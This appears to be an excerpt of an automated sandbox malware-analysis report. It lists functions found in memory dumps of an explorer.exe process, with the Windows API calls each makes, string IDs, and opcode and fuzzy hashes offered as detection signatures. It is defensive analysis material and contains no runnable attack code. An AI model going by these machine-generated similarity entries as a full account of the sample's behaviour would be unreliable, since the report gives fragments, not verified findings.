                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction ID: e41614ff89e17929bf7eb6e335a18cd03637306a743e38be677bbd10df153392
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC217431219B8185DB15DF15F85035AB7A6FB88BC8F888825EA8D5BB18EF7CC185CB40
                                                                                                                                                                                                                        Function 0DF04F60 Relevance: 10.6, APIs: 7, Instructions: 65stringsleepCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DF04FBF
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: EnterCriticalSection.KERNEL32 ref: 0DEF9248
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: RtlInitializeCriticalSection.NTDLL ref: 0DEF9255
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcpyA.KERNEL32 ref: 0DEF928A
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcpyA.KERNEL32 ref: 0DEF92AD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcatA.KERNEL32 ref: 0DEF92BD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrcatA.KERNEL32 ref: 0DEF92CD
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: LeaveCriticalSection.KERNEL32 ref: 0DEF9354
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: memcpy.MSVCRT ref: 0DEF936C
                                                                                                                                                                                                                          • Part of subcall function 0DEF9200: lstrlenA.KERNEL32 ref: 0DEF937A
                                                                                                                                                                                                                        • lstrcmp.KERNEL32 ref: 0DF04FE6
                                                                                                                                                                                                                        • free.MSVCRT ref: 0DF0505A
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0DF05065
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292776791-0
                                                                                                                                                                                                                        • Opcode ID: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction ID: 5a1a97c5d3b2ece652ae13713f155251df9ce34f1792f0c11b75a48e6fc28e09
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6203a74f35660615294003d8cc9a21d14c632def7b9a5e53a8938cc604fafdb1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66217431219B4285EB14DF59B85436EB7A5FB88B84F49C036DA8E47B58EF7CC104CB54
                                                                                                                                                                                                                        Function 00B614ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2785702920.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b40000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: 322866be3479330cba88c6a31d1a895ab3307b3fd2ba78d5691cf377fac86e76
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64E0ED79514106CFC72567A9844A3B872E0FFB9307F5E48F5A8078A222DBBD8884CA53
                                                                                                                                                                                                                        Function 02C014ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2786722156.0000000002BE0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_2be0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: 556a55507944a58d0ec349ecb7631a87ca7e362fb4b5ab62cee27e5794557587
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37E06D78504105CFC72667A4C08A3BC72A1FF5A30AF4E44E1D64A8E6A0D7FC4584CE53
                                                                                                                                                                                                                        Function 0B9B14ED Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2800816052.000000000B990000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B990000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b990000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: 31b41e0f00a7bf95ea18ed56a3aef34309cf052681b03ef9dd9251fdf5980cf5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8E0ED79524515CFC76567A4862EFE832A4FF5A30AF5A44B198069B230D7FC44C0CA93
                                                                                                                                                                                                                        Function 0DFF1BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: bbb627f9d3824c6f8761f8773a26b6d7801dc07e20debba698baf08e1f29f36f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04E0ED36915245D6C7196B6D88543BC3664FFD8709F86D9A5874943320E7BCC881CB12
                                                                                                                                                                                                                        Function 0DF11BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: 26ad4a6c0f90ccc918c52d658d116f137fd7bef024cbec6e2d95559fc15a9c08
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E06D3E914244D6C72DAB6C89443BC3664FB8870DF86D8A5830903310E7BCC881CB12
                                                                                                                                                                                                                        Function 0B0C1BB8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd
                                                                                                                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                                                                                                                        • API String ID: 3186804695-2671469338
                                                                                                                                                                                                                        • Opcode ID: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction ID: 7580cab37ddcced6ccd1d9749244cbdca2de8bcf4b8979357ea7b69ebd0a958e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 322d90a10536da0e470247d97d4a4726ca7384a48e5d6cfc49ac9d57eb562ce2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FE0923A510104DAC71D7F6488153EE32A4F788F09F86D8A9C20013311EBBC44C28F13
                                                                                                                                                                                                                        Function 0DFD47B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction ID: d5a4f2fad4c457501992c515c2d5663823e7c8d0f8d7b994064da71d833d0142
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B721F625E846D386FBB89B19F89433A329BB700FE5F6CC52ED94186954DB3DC088C641
                                                                                                                                                                                                                        Function 0DEF47B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction ID: 7435477e9fd365274cd5ae318d4bf2c2990dd8fdc0a4dfb1ef81f3b2b8d205d0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1021D825B946D286FB349F55E89037B2299A700FADF41A92FEB42A29D4DF2CC148C351
                                                                                                                                                                                                                        Function 0B0A47B0 Relevance: 9.1, APIs: 6, Instructions: 76COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: isdigit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2326231117-0
                                                                                                                                                                                                                        • Opcode ID: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction ID: 93025e70745483ffc662b336302a4aeb99cfd109203d352a0bdc37e4a4a17718
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fc920a29c5e5be1cc7f8e3ac7506c0d811bf2616e18a83dfe5930eede53087d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B21922CE946D286EBBC9BD1F89237EA2DAAB00FE5F404D56C95186B54EBDCD048C241
                                                                                                                                                                                                                        Function 0DFD8660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction ID: 604d83354704aad2f9dc6fd444765cea617e7ab36211400c37eb966f1b472134
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B318032604681C6EB64DF29F45032AB3A2FB89BD8F48C225DA9E47798DF3CC545CB51
                                                                                                                                                                                                                        Function 0DEF8660 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3234909527-0
                                                                                                                                                                                                                        • Opcode ID: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction ID: 1cd12f2a16ba4f0a78b831624ced4ed057d134eacbcbf49cf5c1affe965ff81a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 543581bef6e94fe27694f519775bfffcbdf9333420061ca6165c68780d132ee0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB319372204641C6DB20CF65E49032A77A1FB89B9CF48C226DB9E47794DF38C545DB60
                                                                                                                                                                                                                        Function 0DFE56F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                        • Instruction ID: a81744563868543f2dd154beb5bc20d84d39fc88b94446e3403190c4e26c33e9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA01622570174282EF089B66F9A4729A361AF89FC5F0C94359E4A1B718DE3CC4958700
                                                                                                                                                                                                                        Function 0DF056F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                        • Instruction ID: cce260dba14caf3695257fe34518d90ce11a23a5be1a08eb03acd6ddfae54e54
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14c4a97c4b08b3270cb656e964ed4b1d5c2adef1121c7531c59df40ed71bccd9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A016D2571074682EF18DFA6B95872AA761AF89FC4F09D0369E0F47B68DE3CC1858710
                                                                                                                                                                                                                        Function 0B0B56F0 Relevance: 9.0, APIs: 6, Instructions: 40stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$lstrcpymalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3932841890-0
                                                                                                                                                                                                                        • Opcode ID: 68baedd74d61a6586616d50a2cf080a5e535d65554f7165dc633709d1efe8ec6
                                                                                                                                                                                                                        • Instruction ID: bbd0feb3756ecbac2a6f73211a0cf5efd9f4e9d55535f3a5d797d79086c6e3c6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68baedd74d61a6586616d50a2cf080a5e535d65554f7165dc633709d1efe8ec6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D01862570074182EF489B67B96575AB762BB89FC4F0894358D1A07714DF3CC0458700
                                                                                                                                                                                                                        Function 0DFDEDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E019000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805227444.000000000E01B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfd0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                        • Instruction ID: fdea0c2c2788f6812c2400e0c3c24177ae0ac2d7fd3449f17e927700ae488492
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9313832218681DAC710CFA5E89075AB7B1FB89340F54542AEB8E87B28EB7DC545CF00
                                                                                                                                                                                                                        Function 0DEFEDF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805069960.000000000DEF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DEF0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF39000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2805069960.000000000DF3B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_def0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu$:
                                                                                                                                                                                                                        • API String ID: 3001812590-1109288774
                                                                                                                                                                                                                        • Opcode ID: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                        • Instruction ID: 8bf041ec02b88d0405812534f6a16445de8fc13d242ba4691f3fa7ccea21d6bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c43ced84186744da42210a777eeb42f7e7b29c1cd9660ee2fd5b88daed0ec37
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F312932218681D6D710CFA5F88035AB7B0FB89744F54502AEB8D83B28EB7DC544CF10
                                                                                                                                                                                                                        Function 0DFDECD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2805227444.000000000DFD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFD0000, based on PE: true
